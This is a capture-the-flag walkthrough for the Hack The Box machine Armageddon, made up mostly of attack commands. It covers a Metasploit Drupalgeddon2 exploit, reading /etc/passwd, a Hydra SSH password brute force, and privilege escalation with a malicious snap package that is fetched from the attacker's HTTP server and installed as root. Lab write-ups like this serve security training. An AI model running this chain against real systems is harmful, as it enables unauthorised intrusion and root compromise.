Hack The Box solution: Armageddon ~


Use nmap:

nmap -sCV

Access the web page:

This web is using Drupal 7.


We will use metasploit to exploit this machine.

use exploit/unix/webapp/drupal_drupalgeddon2

Set RHOSTS and LHOST, then exploit.

Find the name of the user:

cat /etc/passwd

We can use hydra with rockyou.txt to brute force the ssh password.

hydra -l brucetherealadmin -P rockyou.txt ssh

And connect to ssh.

ssh brucetherealadmin@

We have the flag.

Privilege Escalation

See what we can do with:

sudo -l

So we can run snap install as root, follow steps in GTFOBins.

You may need to install fpm.

In our machine run:

COMMAND='cat /root/root.txt'
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

Then, host a http server in our machine:

python3 -m http.server

In the server, run:

curl -o xxxx_1.0_all.snap

And get the flag with:

sudo snap install xxxx_1.0_all.snap --dangerous --devmode

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